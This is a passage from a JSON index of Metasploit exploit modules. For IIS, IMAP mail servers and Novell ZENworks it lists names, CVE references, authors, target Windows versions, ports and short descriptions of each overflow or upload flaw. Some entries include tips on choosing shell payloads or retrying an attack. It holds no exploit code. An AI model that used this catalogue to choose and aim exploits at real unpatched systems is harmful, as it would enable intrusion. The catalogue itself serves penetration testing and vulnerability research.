"ref_name": "windows/http/zenworks_assetmgmt_uploadservlet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/zenworks_uploadservlet": {
"name": "Novell ZENworks Configuration Management Remote Execution",
"full_name": "exploit/windows/http/zenworks_uploadservlet",
"rank": 600,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n and then make a secondary request that allows for arbitrary code execution.",
"references": [
"CVE-2010-5324",
"OSVDB-63412",
"BID-39114",
"ZDI-10-078",
"URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html",
"URL-http://www.novell.com/support/kb/doc.php?id=7005573"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Windows x86",
"Linux x86"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/http/zenworks_uploadservlet.rb",
"is_install_path": true,
"ref_name": "windows/http/zenworks_uploadservlet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/iis_webdav_scstoragepathfromurl": {
"name": " Microsoft IIS WebDav ScStoragePathFromUrl Overflow",
"full_name": "exploit/windows/iis/iis_webdav_scstoragepathfromurl",
"rank": 0,
"disclosure_date": "2017-03-26",
"type": "exploit",
"author": [
"Zhiniang Peng",
"Chen Wu",
"Dominic Chell <dominic@mdsec.co.uk>",
"firefart",
"zcgonvh <zcgonvh@qq.com>",
"Rich Whitcroft",
"Lincoln"
],
"description": "Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute arbitrary code via a long header beginning with\n \"If: <http://\" in a PROPFIND request, as exploited in the\n wild in July or August 2016.\n\n Original exploit by Zhiniang Peng and Chen Wu.",
"references": [
"CVE-2017-7269",
"BID-97127",
"URL-https://github.com/edwardz246003/IIS_exploit",
"URL-https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Microsoft Windows Server 2003 R2 SP2 x86"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb",
"is_install_path": true,
"ref_name": "windows/iis/iis_webdav_scstoragepathfromurl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"EXPLODINGCAN"
]
}
},
"exploit_windows/iis/iis_webdav_upload_asp": {
"name": "Microsoft IIS WebDAV Write Access Code Execution",
"full_name": "exploit/windows/iis/iis_webdav_upload_asp",
"rank": 600,
"disclosure_date": "1994-01-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to execute a payload on IIS servers that\n have world-writeable directories. The payload is uploaded as an ASP\n script via a WebDAV PUT request.\n\n The target IIS machine must meet these conditions to be considered\n as exploitable: It allows 'Script resource access', Read and Write\n permission, and supports ASP.",
"references": [
"OSVDB-397",
"BID-12141"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb",
"is_install_path": true,
"ref_name": "windows/iis/iis_webdav_upload_asp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms01_023_printer": {
"name": "MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow",
"full_name": "exploit/windows/iis/ms01_023_printer",
"rank": 400,
"disclosure_date": "2001-05-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow in the request processor of\n the Internet Printing Protocol ISAPI module in IIS. This\n module works against Windows 2000 service pack 0 and 1. If\n the service stops responding after a successful compromise,\n run the exploit a couple more times to completely kill the\n hung process.",
"references": [
"CVE-2001-0241",
"OSVDB-3323",
"BID-2674",
"MSB-MS01-023",
"URL-https://seclists.org/lists/bugtraq/2001/May/0005.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English SP0-SP1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/iis/ms01_023_printer.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms01_023_printer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms01_026_dbldecode": {
"name": "MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution",
"full_name": "exploit/windows/iis/ms01_026_dbldecode",
"rank": 600,
"disclosure_date": "2001-05-15",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n NOTE: This module will leave a metasploit payload in the IIS scripts directory.",
"references": [
"CVE-2001-0333",
"OSVDB-556",
"BID-2708",
"MSB-MS01-026",
"URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms01_026_dbldecode",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms01_033_idq": {
"name": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow",
"full_name": "exploit/windows/iis/ms01_033_idq",
"rank": 400,
"disclosure_date": "2001-06-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.",
"references": [
"CVE-2001-0500",
"OSVDB-568",
"MSB-MS01-033",
"BID-2880"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English SP0",
"Windows 2000 Pro English SP1-SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/ms01_033_idq.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms01_033_idq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms02_018_htr": {
"name": "MS02-018 Microsoft IIS 4.0 .HTR Path Overflow",
"full_name": "exploit/windows/iis/ms02_018_htr",
"rank": 400,
"disclosure_date": "2002-04-10",
"type": "exploit",
"author": [
"stinko <vinnie@metasploit.com>"
],
"description": "This exploits a buffer overflow in the ISAPI ISM.DLL used to\n process HTR scripting in IIS 4.0. This module works against\n Windows NT 4 Service Packs 3, 4, and 5. The server will\n continue to process requests until the payload being\n executed has exited. If you've set EXITFUNC to 'seh', the\n server will continue processing requests, but you will have\n trouble terminating a bind shell. If you set EXITFUNC to\n thread, the server will crash upon exit of the bind shell.\n The payload is alpha-numerically encoded without a NOP sled\n because otherwise the data gets mangled by the filters.",
"references": [
"CVE-1999-0874",
"OSVDB-3325",
"BID-307",
"URL-http://www.eeye.com/html/research/advisories/AD19990608.html",
"MSB-MS02-018"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT 4.0 SP3",
"Windows NT 4.0 SP4",
"Windows NT 4.0 SP5"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/iis/ms02_018_htr.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms02_018_htr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms02_065_msadc": {
"name": "MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",
"full_name": "exploit/windows/iis/ms02_065_msadc",
"rank": 300,
"disclosure_date": "2002-11-20",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module can be used to execute arbitrary code on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service. The service is\n exploitable even when RDS is configured to deny remote connections\n (handsafe.reg). The service is vulnerable to a heap overflow where\n the RDS DataStub 'Content-Type' string is overly long. Microsoft Data\n Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.",
"references": [
"OSVDB-14502",
"BID-6214",
"CVE-2002-1142",
"MSB-MS02-065",
"URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 Pro English SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/iis/ms02_065_msadc.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms02_065_msadc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms03_007_ntdll_webdav": {
"name": "MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",
"full_name": "exploit/windows/iis/ms03_007_ntdll_webdav",
"rank": 500,
"disclosure_date": "2003-05-30",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n through the SEARCH WebDAV method in IIS. This particular\n module only works against Windows 2000. It should have a\n reasonable chance of success against any service pack.",
"references": [
"CVE-2003-0109",
"OSVDB-4467",
"BID-7116",
"MSB-MS03-007"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Brute Force"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms03_007_ntdll_webdav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/msadc": {
"name": "MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution",
"full_name": "exploit/windows/iis/msadc",
"rank": 600,
"disclosure_date": "1998-07-17",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module can be used to execute arbitrary commands on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj\n or AdvancedDataFactory to inject shell commands into Microsoft Access\n databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN).\n Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively\n used in the wild in the late Ninties. MDAC versions affected include MDAC\n 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS\n installed, and NT4 Servers with the NT Option Pack installed or upgraded\n 2000 systems often running IIS3/4/5 however some vulnerable installations\n can still be found on newer Windows operating systems. Note that newer\n releases of msadcs.dll can still be abused however by default remote\n connections to the RDS is denied. Consider using VERBOSE if you're unable\n to successfully execute a command, as the error messages are detailed\n and useful for debugging. Also set NAME to obtain the remote hostname,\n and METHOD to use the alternative VbBusObj technique.",
"references": [
"OSVDB-272",
"BID-529",
"CVE-1999-1011",
"MSB-MS98-004",
"MSB-MS99-025"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/iis/msadc.rb",
"is_install_path": true,
"ref_name": "windows/iis/msadc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/imap/eudora_list": {
"name": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",
"full_name": "exploit/windows/imap/eudora_list",
"rank": 500,
"disclosure_date": "2005-12-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. You may be limited to\n only one attempt, so choose wisely!",
"references": [
"CVE-2005-4267",
"OSVDB-22097",
"BID-15980"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"WorldMail 3 Version 6.1.19.0",
"WorldMail 3 Version 6.1.20.0",
"WorldMail 3 Version 6.1.22.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/eudora_list.rb",
"is_install_path": true,
"ref_name": "windows/imap/eudora_list",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/imail_delete": {
"name": "IMail IMAP4D Delete Overflow",
"full_name": "exploit/windows/imap/imail_delete",
"rank": 200,
"disclosure_date": "2004-11-12",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This module exploits a buffer overflow in the 'DELETE'\n command of the IMail IMAP4D service. This vulnerability\n can only be exploited with a valid username and password.\n This flaw was patched in version 8.14.",
"references": [
"CVE-2004-1520",
"OSVDB-11838",
"BID-11675"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP sp0 comctl32.dll"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/imap/imail_delete.rb",
"is_install_path": true,
"ref_name": "windows/imap/imail_delete",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/ipswitch_search": {
"name": "Ipswitch IMail IMAP SEARCH Buffer Overflow",
"full_name": "exploit/windows/imap/ipswitch_search",
"rank": 200,
"disclosure_date": "2007-07-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n In order for this module to be successful, the IMAP user must have at least one\n message.",
"references": [
"CVE-2007-3925",
"OSVDB-36219",
"BID-24962"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows 2003 SP0 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/ipswitch_search.rb",
"is_install_path": true,
"ref_name": "windows/imap/ipswitch_search",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mailenable_login": {
"name": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow",
"full_name": "exploit/windows/imap/mailenable_login",
"rank": 500,
"disclosure_date": "2006-12-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.",
"references": [
"CVE-2006-6423",
"OSVDB-32125",
"BID-21492"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MailEnable 2.35 Pro",
"MailEnable 2.34 Pro"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mailenable_login.rb",
"is_install_path": true,
"ref_name": "windows/imap/mailenable_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mailenable_status": {
"name": "MailEnable IMAPD (1.54) STATUS Request Buffer Overflow",
"full_name": "exploit/windows/imap/mailenable_status",
"rank": 500,
"disclosure_date": "2005-07-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the STATUS command. With proper\n credentials, this could allow for the execution of arbitrary\n code.",
"references": [
"CVE-2005-2278",
"OSVDB-17844",
"BID-14243",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=19193"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MailEnable 1.54 Pro Universal",
"Windows XP Pro SP0/SP1 English",
"Windows 2000 Pro English ALL",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mailenable_status.rb",
"is_install_path": true,
"ref_name": "windows/imap/mailenable_status",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mailenable_w3c_select": {
"name": "MailEnable IMAPD W3C Logging Buffer Overflow",
"full_name": "exploit/windows/imap/mailenable_w3c_select",
"rank": 500,
"disclosure_date": "2005-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.",
"references": [
"CVE-2005-3155",
"OSVDB-19842",
"BID-15006"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MailEnable 1.54 Pro Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mailenable_w3c_select.rb",
"is_install_path": true,
"ref_name": "windows/imap/mailenable_w3c_select",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mdaemon_cram_md5": {
"name": "Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow",
"full_name": "exploit/windows/imap/mdaemon_cram_md5",
"rank": 500,
"disclosure_date": "2004-11-12",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module exploits a buffer overflow in the CRAM-MD5\n authentication of the MDaemon IMAP service. This\n vulnerability was discovered by Muts.",
"references": [
"CVE-2004-1520",
"OSVDB-11838",
"BID-11675"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MDaemon IMAP 8.0.3 Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mdaemon_cram_md5.rb",
"is_install_path": true,
"ref_name": "windows/imap/mdaemon_cram_md5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mdaemon_fetch": {
"name": "MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",
"full_name": "exploit/windows/imap/mdaemon_fetch",
"rank": 500,
"disclosure_date": "2008-03-13",
"type": "exploit",
"author": [
"Jacopo Cervini",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n account credentials are required. Credit to Matteo Memelli",
"references": [
"CVE-2008-1358",
"OSVDB-43111",
"BID-28245",
"EDB-5248"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MDaemon Version 9.6.4"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/imap/mdaemon_fetch.rb",
"is_install_path": true,
"ref_name": "windows/imap/mdaemon_fetch",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercur_imap_select_overflow": {
"name": "Mercur v5.0 IMAP SP3 SELECT Buffer Overflow",
"full_name": "exploit/windows/imap/mercur_imap_select_overflow",
"rank": 200,
"disclosure_date": "2006-03-17",
"type": "exploit",
"author": [
"Jacopo Cervini <acaro@jervus.it>"
],
"description": "Mercur v5.0 IMAP server is prone to a remotely exploitable\n stack-based buffer overflow vulnerability. This issue is due\n to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.\n Credit to Tim Taylor for discover the vulnerability.",
"references": [
"CVE-2006-1255",
"OSVDB-23950",
"BID-17138"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Server SP4 English",
"Windows 2000 Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mercur_imap_select_overflow.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercur_imap_select_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercur_login": {
"name": "Mercur Messaging 2005 IMAP Login Buffer Overflow",
"full_name": "exploit/windows/imap/mercur_login",
"rank": 200,
"disclosure_date": "2006-03-17",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n Since the room for shellcode is small, using the reverse ordinal payloads\n yields the best results.",
"references": [
"CVE-2006-1255",
"OSVDB-23950",
"BID-17138",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mercur_login.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercur_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercury_login": {
"name": "Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow",
"full_name": "exploit/windows/imap/mercury_login",
"rank": 300,
"disclosure_date": "2007-03-06",
"type": "exploit",
"author": [
"mu-b",
"MC <mc@metasploit.com>",
"Ivan Racic"
],
"description": "This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n LOGIN verb. By sending a specially crafted login command, a buffer\n is corrupted, and code execution is possible. This vulnerability was\n discovered by (mu-b at digit-labs.org).",
"references": [
"CVE-2007-1373",
"EDB-3418"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-10-28 09:41:14 +0000",
"path": "/modules/exploits/windows/imap/mercury_login.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercury_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercury_rename": {
"name": "Mercury/32 v4.01a IMAP RENAME Buffer Overflow",
"full_name": "exploit/windows/imap/mercury_rename",
"rank": 200,
"disclosure_date": "2004-11-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow vulnerability in the\n Mercury/32 v.4.01a IMAP service.",
"references": [
"CVE-2004-1211",
"OSVDB-12508",
"BID-11775",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=15867"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mercury_rename.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercury_rename",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_append": {
"name": "Novell NetMail IMAP APPEND Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_append",
"rank": 200,
"disclosure_date": "2006-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2006-6425",
"OSVDB-31362",
"BID-21723",
"ZDI-06-054"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_append.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_append",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_auth": {
"name": "Novell NetMail IMAP AUTHENTICATE Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_auth",
"rank": 200,
"disclosure_date": "2007-01-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.",
"references": [
"OSVDB-55175"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_auth.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_auth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_status": {
"name": "Novell NetMail IMAP STATUS Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_status",
"rank": 200,
"disclosure_date": "2005-11-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2005-3314",
"OSVDB-20956",
"BID-15491"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_status.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_status",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_subscribe": {
"name": "Novell NetMail IMAP SUBSCRIBE Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_subscribe",
"rank": 200,
"disclosure_date": "2006-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2006-6761",
"OSVDB-31360",
"BID-21728",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_subscribe.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_subscribe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/ms00_094_pbserver": {
"name": "MS00-094 Microsoft IIS Phone Book Service Overflow",
"full_name": "exploit/windows/isapi/ms00_094_pbserver",
"rank": 400,
"disclosure_date": "2000-12-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is an exploit for the Phone Book Service /pbserver/pbserver.dll\n described in MS00-094. By sending an overly long URL argument\n for phone book updates, it is possible to overwrite the stack. This\n module has only been tested against Windows 2000 SP1.",
"references": [
"CVE-2000-1089",
"OSVDB-463",
"BID-2048",
"MSB-MS00-094"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP1",
"Windows 2000 SP0",
"Windows NT SP6"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/isapi/ms00_094_pbserver.rb",
"is_install_path": true,
"ref_name": "windows/isapi/ms00_094_pbserver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/ms03_022_nsiislog_post": {
"name": "MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",
"full_name": "exploit/windows/isapi/ms03_022_nsiislog_post",
"rank": 400,
"disclosure_date": "2003-06-25",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow found in the nsiislog.dll\n ISAPI filter that comes with Windows Media Server. This\n module will also work against the 'patched' MS03-019\n version. This vulnerability was addressed by MS03-022.",
"references": [
"CVE-2003-0349",
"OSVDB-4535",
"BID-8035",
"MSB-MS03-022",
"URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html"
],
